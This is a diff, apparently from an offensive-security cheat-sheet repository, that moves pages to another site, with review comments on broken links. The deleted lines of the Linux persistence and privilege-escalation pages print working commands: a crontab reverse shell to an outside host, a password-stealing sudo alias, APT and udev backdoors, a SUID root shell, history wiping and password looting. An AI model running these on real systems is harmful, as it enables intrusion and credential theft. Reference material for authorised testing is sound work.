* [Mimikatz Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#mimikatz-kit)
* [Sleep Mask Kit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#sleep-mask-kit)
* [Thread Stack Spoofer](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#thread-stack-spoofer)
* [Beacon Object Files](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#beacon-object-files)
* [NTLM Relaying via Cobalt Strike](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#ntlm-relaying-via-cobalt-strike)
* [References](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/#references)
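Review bot: typo in the Cobalt Strike summary: the entry `* [Powershell commabds](...#powershell-commands)` should read `Powershell commands`; the anchor itself is already spelled correctly.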

@@ -0,0 +1,14 @@
# Container - Docker
:warning: Content of this page has been moved to [InternalAllTheThings/containers/docker](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/)
- [Tools](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#tools)
- [Mounted Docker Socket](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#mounted-docker-socket)
- [Open Docker API Port](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#open-docker-api-port)
- [Insecure Docker Registry](#insecure-docker-registry)
- [Exploit privileged container abusing the Linux cgroup v1](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#exploit-privileged-container-abusing-the-linux-cgroup-v1)
- [Abusing CAP_SYS_ADMIN capability](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#abusing-capsysadmin-capability)
- [Abusing coredumps and core_pattern](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#abusing-coredumps-and-corepattern)
- [Breaking out of Docker via runC](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#breaking-out-of-docker-via-runc)
- [Breaking out of containers using a device file](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#breaking-out-of-containers-using-a-device-file)
- [References](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#references)
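Review bot: `- [Insecure Docker Registry](#insecure-docker-registry)` is a page-relative anchor, but this stub no longer contains that section, so the link is dead after the move. Make it an absolute link like its siblings, `https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#insecure-docker-registry`.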

@@ -0,0 +1,9 @@
# Container - Kubernetes
:warning: Content of this page has been moved to [InternalAllTheThings/containers/kubernetes/](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/)
- [Tools](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#tools)
- [Exploits](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#exploits)
- [Accessible kubelet on 10250/TCP](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#accessible-kubelet-on-10250tcp)
- [Obtaining Service Account Token](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#obtaining-service-account-token)
- [References](#references)
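Review bot: `- [References](#references)` in the Kubernetes stub is a page-relative anchor to a section that was removed with the rest of the content; point it at `https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#references` like the other entries.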

@@ -0,0 +1,16 @@
# Application Escape and Breakout
:warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/escape-breakout](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/)
* [Gaining a command shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#gaining-a-command-shell)
* [Sticky Keys](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#sticky-keys)
* [Dialog Boxes](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#dialog-boxes)
* [Creating new files](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#creating-new-files)
* [Open a new Windows Explorer instance](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#open-a-new-windows-explorer-instance)
* [Exploring Context Menus](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#exploring-context-menus)
* [Save as](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#save-as)
* [Input Boxes](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#input-boxes)
* [Bypass file restrictions](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#bypass-file-restrictions)
* [Internet Explorer](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#internet-explorer)
* [Shell URI Handlers](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#shell-uri-handlers)
* [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#references)

@@ -0,0 +1,6 @@
# HTML Smuggling
:warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/html-smuggling](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/)
- [Description](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/#description)
- [Executable Storage](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/#executable-storage)

@@ -0,0 +1,15 @@
# Hash Cracking
:warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/hash-cracking](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/)
* [Hashcat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#hashcat)
* [Hashcat Example Hashes](https://hashcat.net/wiki/doku.php?id=example_hashes)
* [Hashcat Install](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#hashcat-install)
* [Mask attack](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#mask-attack)
* [Dictionary](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#dictionary)
* [John](https://github.com/openwall/john)
* [Usage](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#john-usage)
* [Rainbow tables](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#rainbow-tables)
* [Tips and Tricks](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#tips-and-tricks)
* [Online Cracking Resources](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#online-cracking-resources)
* [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#references)

@@ -0,0 +1,11 @@
# Initial Access
:warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/initial-access](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/)
* [Complex Chains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#complex-chains)
* [Container](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#container)
* [Payload](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#payload)
* [Binary Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#binary-files)
* [Code Execution Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#code-execution-files)
* [Embedded Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#embedded-files)
* [Code Signing](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#code-signing)

@@ -0,0 +1,8 @@
# Linux - Evasion
:warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/initial-access](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/)
- [File names](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#file-names)
- [Command history](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#command-history)
- [Hiding text](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#hiding-text)
- [Timestomping](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#timestomping)
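Review bot: the link text of the Linux Evasion `:warning:` line says `InternalAllTheThings/redteam/access/initial-access` (copied from the Initial Access stub) while the URL correctly targets `redteam/evasion/linux-evasion/`; change the label to `InternalAllTheThings/redteam/evasion/linux-evasion`.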

@@ -1,164 +1,18 @@
# Linux - Persistence # Linux - Persistence
## Summary :warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/linux-persistence](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/)
* [Basic reverse shell](#basic-reverse-shell) * [Basic reverse shell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#basic-reverse-shell)
* [Add a root user](#add-a-root-user) * [Add a root user](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#add-a-root-user)
* [Suid Binary](#suid-binary) * [Suid Binary](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#suid-binary)
* [Crontab - Reverse shell](#crontab-reverse-shell) * [Crontab - Reverse shell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#crontab---reverse-shell)
* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc) * [Backdooring a user's bash_rc](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-users-bash_rc)
* [Backdooring a startup service](#backdoor-a-startup-service) * [Backdooring a startup service](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-startup-service)
* [Backdooring a user startup file](#backdooring-an-user-startup-file) * [Backdooring a user startup file](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-user-startup-file)
* [Backdooring a driver](#backdooring-a-driver) * [Backdooring Message of the Day](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-message-of-the-day)
* [Backdooring the APT](#backdooring-the-apt) * [Backdooring a driver](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-driver)
* [Backdooring the SSH](#backdooring-the-ssh) * [Backdooring the APT](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-the-apt)
* [Tips](#tips) * [Backdooring the SSH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-the-ssh)
* [References](#references) * [Backdooring Git](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-git)
* [Additional Linux Persistence Options](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#additional-persistence-options)
* [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#references)
## Basic reverse shell
```bash
ncat --udp -lvp 4242
ncat --sctp -lvp 4242
ncat --tcp -lvp 4242
```
## Add a root user
```powershell
sudo useradd -ou 0 -g 0 john
sudo passwd john
echo "linuxpassword" | passwd --stdin john
```
## Suid Binary
```powershell
TMPDIR2="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
rm $TMPDIR2/croissant.c
chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant
```
## Crontab - Reverse shell
```bash
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
```
## Backdooring a user's bash_rc
(FR/EN Version)
```bash
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
cat << EOF > /tmp/$TMPNAME2
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
EOF
if [ -f ~/.bashrc ]; then
cat /tmp/$TMPNAME2 >> ~/.bashrc
fi
if [ -f ~/.zshrc ]; then
cat /tmp/$TMPNAME2 >> ~/.zshrc
fi
rm /tmp/$TMPNAME2
```
## Backdooring a startup service
```bash
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
```
## Backdooring a user startup file
Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop`
```powershell
In : ~/.config/autostart/*.desktop
[Desktop Entry]
Type=Application
Name=Welcome
Exec=/var/lib/gnome-welcome-tour
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
OnlyShowIn=GNOME;
X-GNOME-Autostart-enabled=false
```
## Backdooring a driver
```bash
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
```
## Backdooring the APT
If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};`
Next time "apt-get update" is done, your CMD will be executed!
```bash
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
```
## Backdooring the SSH
Add an ssh key into the `~/.ssh` folder.
1. `ssh-keygen`
2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys`
3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys
## Tips
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
```bash
## Do not remove. Generated from /etc/issue.conf by configure.
```
Clear the last line of the history.
```bash
history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null
```
Clear history
```bash
[SPACE] ANY COMMAND
or
export HISTSIZE=0
export HISTFILESIZE=0
unset HISTFILE; CTRL-D
or
kill -9 $$
or
echo "" > ~/.bash_history
or
rm ~/.bash_history -rf
or
history -c
or
ln /dev/null ~/.bash_history -sf
```
The following directories are temporary and usually writeable
```bash
/var/tmp/
/tmp/
/dev/shm/
```
## References
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html)
* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/)
* [Pouki from JDI](#no_source_code)
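Review bot: the new Linux Persistence summary has no entry for the old `## Tips` section (ANSI-hiding of payload text, history clearing, writable temporary directories) even though that section is deleted here along with the rest of the page; either link it on the destination page or state that it was dropped. The removed reference `* [Pouki from JDI](#no_source_code)` is also a dead anchor and should not be recreated as-is on the moved page.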

@@ -1,646 +1,50 @@
# Linux - Privilege Escalation # Linux - Privilege Escalation
## Tools :warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/linux-persistence](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/)
- [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum) * [Tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#tools)
```powershell * [Checklist](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#checklists)
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t * [Looting for passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#looting-for-passwords)
``` * [Files containing passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#files-containing-passwords)
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) * [Old passwords in /etc/security/opasswd](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#old-passwords-in-etcsecurityopasswd)
- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) * [Last edited files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#last-edited-files)
- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) * [In memory passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#in-memory-passwords)
* [Find sensitive files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#find-sensitive-files)
## Summary * [SSH Key](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ssh-key)
* [Sensitive files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#sensitive-files)
* [Checklist](#checklist) * [SSH Key Predictable PRNG (Authorized_Keys) Process](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ssh-key-predictable-prng-authorized_keys-process)
* [Looting for passwords](#looting-for-passwords) * [Scheduled tasks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#scheduled-tasks)
* [Files containing passwords](#files-containing-passwords) * [Cron jobs](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs)
* [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd) * [Systemd timers](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#systemd-timers)
* [Last edited files](#last-edited-files) * [SUID](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#suid)
* [In memory passwords](#in-memory-passwords) * [Find SUID binaries](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#find-suid-binaries)
* [Find sensitive files](#find-sensitive-files) * [Create a SUID binary](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#create-a-suid-binary)
* [Scheduled tasks](#scheduled-tasks) * [Capabilities](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#capabilities)
* [Cron jobs](#cron-jobs) * [List capabilities of binaries](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#list-capabilities-of-binaries)
* [Systemd timers](#systemd-timers) * [Edit capabilities](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#edit-capabilities)
* [SUID](#suid) * [Interesting capabilities](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#interesting-capabilities)
* [Find SUID binaries](#find-suid-binaries) * [SUDO](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#sudo)
* [Create a SUID binary](#create-a-suid-binary) * [NOPASSWD](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#nopasswd)
* [Capabilities](#capabilities) * [LD_PRELOAD and NOPASSWD](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ld_preload-and-nopasswd)
* [List capabilities of binaries](#list-capabilities-of-binaries) * [Doas](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#doas)
* [Edit capabilities](#edit-capabilities) * [sudo_inject](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#sudo_inject)
* [Interesting capabilities](#interesting-capabilities) * [CVE-2019-14287](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2019-14287)
* [SUDO](#sudo) * [GTFOBins](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#gtfobins)
* [NOPASSWD](#nopasswd) * [Wildcard](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#wildcard)
* [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd) * [Writable files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#writable-files)
* [Doas](#doas) * [Writable /etc/passwd](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#writable-etcpasswd)
* [sudo_inject](#sudo-inject) * [Writable /etc/sudoers](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#writable-etcsudoers)
* [GTFOBins](#gtfobins) * [NFS Root Squashing](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#nfs-root-squashing)
* [Wildcard](#wildcard) * [Shared Library](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#shared-library)
* [Writable files](#writable-files) * [ldconfig](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ldconfig)
* [Writable /etc/passwd](#writable-etcpasswd) * [RPATH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#rpath)
* [Writable /etc/sudoers](#writable-etcsudoers) * [Groups](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#groups)
* [NFS Root Squashing](#nfs-root-squashing) * [Docker](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#docker)
* [Shared Library](#shared-library) * [LXC/LXD](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#lxclxd)
* [ldconfig](#ldconfig) * [Hijack TMUX session](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#hijack-tmux-session)
* [RPATH](#rpath) * [Kernel Exploits](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#kernel-exploits)
* [Groups](#groups) * [CVE-2022-0847 (DirtyPipe)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2022-0847-dirtypipe)
* [Docker](#docker) * [CVE-2016-5195 (DirtyCow)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2016-5195-dirtycow)
* [LXC/LXD](#lxclxd) * [CVE-2010-3904 (RDS)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2010-3904-rds)
* [Kernel Exploits](#kernel-exploits) * [CVE-2010-4258 (Full Nelson)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2010-4258-full-nelson)
* [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow) * [CVE-2012-0056 (Mempodipper)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2012-0056-mempodipper)
* [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
* [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
* [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)
## Checklists
* Kernel and distribution release details
* System Information:
* Hostname
* Networking details:
* Current IP
* Default route details
* DNS server information
* User Information:
* Current user details
* Last logged on users
* Shows users logged onto the host
* List all users including uid/gid information
* List root accounts
* Extracts password policies and hash storage method information
* Checks umask value
* Checks if password hashes are stored in /etc/passwd
* Extract full details for 'default' uid's such as 0, 1000, 1001 etc
* Attempt to read restricted files i.e. /etc/shadow
* List current users history files (i.e .bash_history, .nano_history etc.)
* Basic SSH checks
* Privileged access:
* Which users have recently used sudo
* Determine if /etc/sudoers is accessible
* Determine if the current user has Sudo access without a password
* Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.)
* Is root's home directory accessible
* List permissions for /home/
* Environmental:
* Display current $PATH
* Displays env information
* Jobs/Tasks:
* List all cron jobs
* Locate all world-writable cron jobs
* Locate cron jobs owned by other users of the system
* List the active and inactive systemd timers
* Services:
* List network connections (TCP & UDP)
* List running processes
* Lookup and list process binaries and associated permissions
* List inetd.conf/xined.conf contents and associated binary file permissions
* List init.d binary permissions
* Version Information (of the following):
* Sudo
* MYSQL
* Postgres
* Apache
* Checks user config
* Shows enabled modules
* Checks for htpasswd files
* View www directories
* Default/Weak Credentials:
* Checks for default/weak Postgres accounts
* Checks for default/weak MYSQL accounts
* Searches:
* Locate all SUID/GUID files
* Locate all world-writable SUID/GUID files
* Locate all SUID/GUID files owned by root
* Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc)
* Locate files with POSIX capabilities
* List all world-writable files
* Find/list all accessible *.plan files and display contents
* Find/list all accessible *.rhosts files and display contents
* Show NFS server details
* Locate *.conf and *.log files containing keyword supplied at script runtime
* List all *.conf files located in /etc
* Locate mail
* Platform/software specific tests:
* Checks to determine if we're in a Docker container
* Checks to see if the host has Docker installed
* Checks to determine if we're in an LXC container
## Looting for passwords
### Files containing passwords
```powershell
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
```
### Old passwords in /etc/security/opasswd
The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
:warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes
### Last edited files
Files that were edited in the last 10 minutes
```powershell
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
```
### In memory passwords
```powershell
strings /dev/mem -n10 | grep -i PASS
```
### Find sensitive files
```powershell
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
...
```
## Scheduled tasks
### Cron jobs
Check if you have access with write permission on these files.
Check inside the file, to find other paths with write permissions.
```powershell
/etc/init.d
/etc/cron*
/etc/crontab
/etc/cron.allow
/etc/cron.d
/etc/cron.deny
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
/etc/sudoers
/etc/exports
/etc/anacrontab
/var/spool/cron
/var/spool/cron/crontabs/root
crontab -l
ls -alh /var/spool/cron;
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny*
```
## Systemd timers
```powershell
systemctl list-timers --all
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2019-04-01 02:59:14 CEST 15h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily.timer apt-daily.service
Mon 2019-04-01 06:20:40 CEST 19h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2019-04-01 07:36:10 CEST 20h left Sat 2019-03-09 14:28:25 CET 3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
3 timers listed.
```
## SUID
SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is ran, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`.
```powershell
╭─swissky@lab ~
╰─$ ls /usr/bin/sudo -alh
-rwsr-xr-x 1 root root 138K 23 nov. 16:04 /usr/bin/sudo
```
### Find SUID binaries
```bash
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
```
### Create a SUID binary
```bash
print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c
gcc -o /tmp/suid /tmp/suid.c
sudo chmod +x /tmp/suid # execute right
sudo chmod +s /tmp/suid # setuid bit
```
## Capabilities
### List capabilities of binaries
```bash
╭─swissky@lab ~
╰─$ /usr/bin/getcap -r /usr/bin
/usr/bin/fping = cap_net_raw+ep
/usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/rlogin = cap_net_bind_service+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/rsh = cap_net_bind_service+ep
/usr/bin/rcp = cap_net_bind_service+ep
```
### Edit capabilities
```powershell
/usr/bin/setcap -r /bin/ping # remove
/usr/bin/setcap cap_net_raw+p /bin/ping # add
```
### Interesting capabilities
Having the capability =ep means the binary has all the capabilities.
```powershell
$ getcap openssl /usr/bin/openssl
openssl=ep
```
Alternatively the following capabilities can be used in order to upgrade your current privileges.
```powershell
cap_dac_read_search # read anything
cap_setuid+ep # setuid
```
Example of privilege escalation with `cap_setuid+ep`
```powershell
$ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7
$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
sh-5.0# id
uid=0(root) gid=1000(swissky)
```
## SUDO
### NOPASSWD
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
```bash
$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim
```
In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`.
```bash
sudo vim -c '!sh'
sudo -u root vim -c '!sh'
```
### LD_PRELOAD and NOPASSWD
If `LD_PRELOAD` is explicitly defined in the sudoers file
```powershell
Defaults env_keep += LD_PRELOAD
```
Compile the following C code with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
```powershell
#include <stdio.h>
